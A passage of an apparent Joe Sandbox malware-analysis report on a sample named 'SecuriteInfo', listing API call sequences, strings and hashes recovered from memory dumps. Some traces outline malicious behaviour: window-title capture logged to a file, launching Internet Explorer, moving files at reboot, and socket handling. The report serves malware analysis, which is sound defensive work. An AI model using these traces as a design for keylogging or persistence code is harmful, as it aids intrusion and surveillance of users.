                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Color$BrushMessage$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
                                • API String ID: 105928552-698929750
                                • Opcode ID: a9bf061ff14305381aa72ea89dbeabd6568e112ee935ac5916c0b6bb4eea9dfb
                                • Instruction ID: b55eb1d7a0101aba1216099e0e48becfc402de59605b64d88837fedf852f219a
                                • Opcode Fuzzy Hash: a9bf061ff14305381aa72ea89dbeabd6568e112ee935ac5916c0b6bb4eea9dfb
                                • Instruction Fuzzy Hash: 14115E74A14209EFD720CFA4DA4DBAD7BB1FF48700F2042A5E909967D1D7788E42EA11
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 1000166B
                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10001691
                                • CancelIo.KERNEL32(?), ref: 1000169B
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 100016A4
                                • closesocket.WS2_32(?), ref: 100016AE
                                • SetEvent.KERNEL32(?), ref: 100016B8
                                • CloseHandle.KERNEL32(?,?,00000000), ref: 100016CF
                                • CloseHandle.KERNEL32(?,?,00000000), ref: 100016D5
                                • WSACleanup.WS2_32 ref: 100016D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                • String ID:
                                • API String ID: 136543108-0
                                • Opcode ID: 145d0b8cef7e6e148758ece99e1c01661d2e5a45c76c585b84a733c4a96430e8
                                • Instruction ID: 62fee614de69f977455362613bb6447f7427fad559a06c7403c386172e43425c
                                • Opcode Fuzzy Hash: 145d0b8cef7e6e148758ece99e1c01661d2e5a45c76c585b84a733c4a96430e8
                                • Instruction Fuzzy Hash: C2216B75500751DFD320DBA8CD88B9EB7B8EB09721F148708F6A297AD0CBB5A5048BA1
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006D34AC
                                • InterlockedDecrement.KERNEL32(?), ref: 006D34CE
                                • SysFreeString.OLEAUT32(00000000), ref: 006D34DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: ' Where Id=$Update BaseType Set TypeName='$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-792143027
                                • Opcode ID: f9fc0f978bd5b48f4beca0edb2879d3c75c9959fb43bcb7e9ec0319e3cd9f441
                                • Instruction ID: 754b34027c2727d0278105e816621c84ebec94eb7e250d0a599bd0101e1ef55a
                                • Opcode Fuzzy Hash: f9fc0f978bd5b48f4beca0edb2879d3c75c9959fb43bcb7e9ec0319e3cd9f441
                                • Instruction Fuzzy Hash: DC713772D407119FDB21DB68DC02BDAB7B4EF54724F14861EE925A73C1C778AA04CBA2
                                APIs
                                • _memset.LIBCMT ref: 0090ABD1
                                • __snwprintf_s.LIBCMTD ref: 0090AC8B
                                  • Part of subcall function 008E27F0: __vsnprintf_s_l.LIBCMTD ref: 008E2812
                                • __snwprintf_s.LIBCMTD ref: 0090AD80
                                • __strftime_l.LIBCMTD ref: 0090AE48
                                • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,00000000), ref: 0090AEA6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __snwprintf_s$DebugOutputString__strftime_l__vsnprintf_s_l_memset
                                • String ID: %S: $%s(%d) :
                                • API String ID: 1479774519-3296787804
                                • Opcode ID: ba76f812560301a3086d098d92b0a2248fcbe620971d9cac95e0ed5cbffb4bb0
                                • Instruction ID: 321fe47cdcd127077b16c46c360ff06f1cf3685b91a0abdf822f3f81778fd3ad
                                • Opcode Fuzzy Hash: ba76f812560301a3086d098d92b0a2248fcbe620971d9cac95e0ed5cbffb4bb0
                                • Instruction Fuzzy Hash: 2B814FF190021CDFDB24EF64CD45B9A77B9FB85304F0081A8E605A7282D7745A85CFAB
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GlobalLock.KERNEL32(?), ref: 00753C1A
                                • lstrlenA.KERNEL32(0093D4D0), ref: 00753C78
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0093D4D0,000000FF,?,00000020), ref: 00753C9E
                                • _wcslen.LIBCMTD ref: 00753CDE
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp, xrefs: 00753BF5
                                • , xrefs: 00753C81
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ByteCharGlobalLockMultiPeekPostQuitWide_wcslenlstrlen
                                • String ID: $f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp
                                • API String ID: 2647569687-763708097
                                • Opcode ID: 6c417d01243d491a54b3f143d523866cce3e0f67e3e8e3207f93cd668ca97153
                                • Instruction ID: 73f4266c51fd0c4bf6476242c25a26c85e2f527a5e986245f39ae406369e25aa
                                • Opcode Fuzzy Hash: 6c417d01243d491a54b3f143d523866cce3e0f67e3e8e3207f93cd668ca97153
                                • Instruction Fuzzy Hash: BC8108B5E00209DFDB14DFA8C984AEEB7B1BF48301F208659E815AB352D775AA45CF60
                                APIs
                                • _memset.LIBCMT ref: 100059C3
                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100059DE
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10005A0B
                                • CloseHandle.KERNEL32(00000000), ref: 10005A16
                                • wsprintfA.USER32 ref: 10005A47
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleWrite_memsetwsprintf
                                • String ID: %s %s
                                • API String ID: 3996679978-2939940506
                                • Opcode ID: 9d6a41c275e7e4a0ddd029a55a46e19123e015b110f9c8e1f9b2a41791d0ef21
                                • Instruction ID: 5ed6458671dbf51f34da2f9cdb653f73bc8f78980bae36c052d6c940b575f316
                                • Opcode Fuzzy Hash: 9d6a41c275e7e4a0ddd029a55a46e19123e015b110f9c8e1f9b2a41791d0ef21
                                • Instruction Fuzzy Hash: D131D07760021897E710DB68DC85FDB73ACE745352F444396FA0CAB1C4DA779E848791
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,?), ref: 10006BF0
                                • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 10006BFF
                                • LoadLibraryA.KERNEL32(67756C50), ref: 10006C3E
                                  • Part of subcall function 100087C4: _malloc.LIBCMT ref: 100087D2
                                • GetProcAddress.KERNEL32(00000000,?), ref: 10006CAC
                                • FreeLibrary.KERNEL32(?), ref: 10006CF3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressLoadProc$Free_malloc
                                • String ID: IsBadReadPtr$kernel32.dll
                                • API String ID: 1447571555-2271619998
                                • Opcode ID: 5d390b0fc480185ea00d1ee213972a0846801f52d45221e1d24b37f83d80008e
                                • Instruction ID: a386ce572893676be55ab392f3f5c29bc80c06f8e8201702af0a426b7bbe52ac
                                • Opcode Fuzzy Hash: 5d390b0fc480185ea00d1ee213972a0846801f52d45221e1d24b37f83d80008e
                                • Instruction Fuzzy Hash: 8D415E71A00616EBFB10CFA4CC84A6AB7B9FF48398F258169DC85A7245DB31ED10CB90
                                APIs
                                • GetMessageA.USER32(-00000030,00000000,00000000,00000000), ref: 0071271D
                                • TranslateMessage.USER32(-00000030), ref: 007127EF
                                • DispatchMessageA.USER32(-00000030), ref: 007127FC
                                Strings
                                • Error: CWinThread::PumpMessage called when not permitted., xrefs: 00712773
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp, xrefs: 0071273E, 0071278A, 007127A9
                                • CWinThread::PumpMessage - Received WM_QUIT., xrefs: 00712727
                                • PumpMessage, xrefs: 007127BF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchTranslate
                                • String ID: CWinThread::PumpMessage - Received WM_QUIT.$Error: CWinThread::PumpMessage called when not permitted.$PumpMessage$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp
                                • API String ID: 1706434739-3268507515
                                • Opcode ID: d86e6ab4e4b2700bd692eddef2a2da2412dbace440a992c7221f9cf2871d70da
                                • Instruction ID: 4032d2e4f92d66b339719c1ab2d84a3cb6262b50fb1e4c57ce6b9517b415de94
                                • Opcode Fuzzy Hash: d86e6ab4e4b2700bd692eddef2a2da2412dbace440a992c7221f9cf2871d70da
                                • Instruction Fuzzy Hash: DB21C774F40204FBE714E7E8CD57FAEB3A69F90308F104059F901AB2C3D6B5AE519659
                                APIs
                                • _memset.LIBCMT ref: 10005C2F
                                • lstrlenA.KERNEL32(?), ref: 10005C69
                                • lstrcpyA.KERNEL32(00000000,?), ref: 10005C8D
                                • _memset.LIBCMT ref: 10005C9B
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005CE3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$CreateProcesslstrcpylstrlen
                                • String ID: Applications\iexplore.exe\shell\open\command$D
                                • API String ID: 3203297865-535818822
                                • Opcode ID: 19a6c51b03bd6ee0a8da95212632e643e2af58c12bb02da74adfc9eb33182c9a
                                • Instruction ID: af106c191874cc9ddc7eb71111129ea83cc4499e167c76930662f4e1658d759e
                                • Opcode Fuzzy Hash: 19a6c51b03bd6ee0a8da95212632e643e2af58c12bb02da74adfc9eb33182c9a
                                • Instruction Fuzzy Hash: 09218475900314FFFB10DBA0CC4AFDA77A8EB45746F048054FA04AE185E7B6A6848BD1
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10003AEC
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10003AFE
                                • GetTickCount.KERNEL32 ref: 10003B04
                                • wsprintfA.USER32 ref: 10003B1A
                                • MoveFileA.KERNEL32(?,?), ref: 10003B31
                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 10003B42
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                • String ID: %s\%d.bak
                                • API String ID: 830686190-2116986511
                                • Opcode ID: 190460290b21ce499476bec258ef97b5f27933b7db8393a6ed2b0e60e395ac65
                                • Instruction ID: b02ebccee053f55486fa2b5ccaadbe713a4f4b81252f7f1cc31221a8f265dc16
                                • Opcode Fuzzy Hash: 190460290b21ce499476bec258ef97b5f27933b7db8393a6ed2b0e60e395ac65
                                • Instruction Fuzzy Hash: 56F04FB6550328FBE710EBA4CCC9FDA777CAB14702F448585F7559A090DAB2DA848B60
                                APIs
                                • _memset.LIBCMT ref: 10004B76
                                • GetForegroundWindow.USER32(?,?,00000000), ref: 10004B7E
                                • GetWindowTextA.USER32(00000000,1001D330,00000400), ref: 10004B94
                                • _memset.LIBCMT ref: 10004BB0
                                • lstrlenA.KERNEL32(1001D330,?,?,?,?,?,00000000), ref: 10004BCB
                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,00000000), ref: 10004BD9
                                • wsprintfA.USER32 ref: 10004C0E
                                  • Part of subcall function 10004A30: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10004A48
                                  • Part of subcall function 10004A30: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 10004AD2
                                  • Part of subcall function 10004A30: GetFileSize.KERNEL32(00000000,00000000), ref: 10004AE7
                                  • Part of subcall function 10004A30: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004AFB
                                  • Part of subcall function 10004A30: lstrlenA.KERNEL32(00000000), ref: 10004B05
                                  • Part of subcall function 10004A30: lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 10004B33
                                  • Part of subcall function 10004A30: WriteFile.KERNEL32(?,00000000,00000000), ref: 10004B3F
                                • _memset.LIBCMT ref: 10004C2B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_memsetlstrlen$Window$CreateDirectoryForegroundLocalPointerSizeSystemTextTimeWritewsprintf
                                • String ID:
                                • API String ID: 509222289-0
                                • Opcode ID: 5101b0396bcb22be52cdd02a95720f35753af4c29cf0d52aba821d79ca488860
                                • Instruction ID: a13d6e15ade3c4148278e6f8ef93e4b6a526ccb35d9a39baa6ae12c031d3c880
                                • Opcode Fuzzy Hash: 5101b0396bcb22be52cdd02a95720f35753af4c29cf0d52aba821d79ca488860
                                • Instruction Fuzzy Hash: 9B21C3B1800134BAE710FB908C45FBA77B8FB48B02F008456FB04A6180E774A780C769
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteObject
                                • String ID: (
                                • API String ID: 1531683806-3887548279
                                • Opcode ID: 201725f443b53f6afe5405bc22429bc297e79915aba143b3b1ff9fd76d00cab9
                                • Instruction ID: 60c344ebf04df4e046728b76e7a6b803c497265d918454deed4faf2a498d44fd
                                • Opcode Fuzzy Hash: 201725f443b53f6afe5405bc22429bc297e79915aba143b3b1ff9fd76d00cab9
                                • Instruction Fuzzy Hash: 1FF1D270D01258DFDB24DF99C894BEEB7B5BF48300F208299E419AB291DB786E85CF51
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 0072C96F
                                • _swprintf_s.LIBCMTD ref: 0072C9A4
                                  • Part of subcall function 008E27C0: __vsprintf_s_l.LIBCMTD ref: 008E27DE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ClipboardFormatNamePeekPostQuit__vsprintf_s_l_swprintf_s
                                • String ID: %s: hwnd=0x%08X, msg = %hs (0x%08X, 0x%08X)$%s: hwnd=0x%08X, msg = 0x%04X (0x%08X, 0x%08X)$WM_USER+0x%04X$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp
                                • API String ID: 305662926-3432606522
                                • Opcode ID: 3864fb397d290191b2804268bf0ef1de7cc33192bac04aeee19b54c263643178
                                • Instruction ID: 125d0c684712006eeddc206c000f426445e91a6056b84647e0ec3851c54f6c42
                                • Opcode Fuzzy Hash: 3864fb397d290191b2804268bf0ef1de7cc33192bac04aeee19b54c263643178
                                • Instruction Fuzzy Hash: 4D817F70A00218EFDB15CF98D595AADB7B6EF94314F24C219F9499F281D778EE82CB40
                                APIs
                                • IsWindow.USER32(?), ref: 007001B2
                                • GetParent.USER32(?), ref: 00700231
                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0070028F
                                • SendMessageA.USER32(00000000,00000121,00000000,?), ref: 0070030A
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$ParentPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 2418108151-4102074842
                                • Opcode ID: b6521092bdaadcb8bf972f88a290a43d52f3c497b3b5757214542a054937fe6a
                                • Instruction ID: b8cecc4509473e1debfecbbec42a040612702558882843f1446714e797743868
                                • Opcode Fuzzy Hash: b6521092bdaadcb8bf972f88a290a43d52f3c497b3b5757214542a054937fe6a
                                • Instruction Fuzzy Hash: 01713E74A0020ADBDB14DB94C85ABBEB7B5BF44314F144258EA05AB3D1D7B8ED81CBD0
                                APIs
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006EEFBF
                                • InterlockedDecrement.KERNEL32(?), ref: 006EEFE1
                                • SysFreeString.OLEAUT32(00000000), ref: 006EEFF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
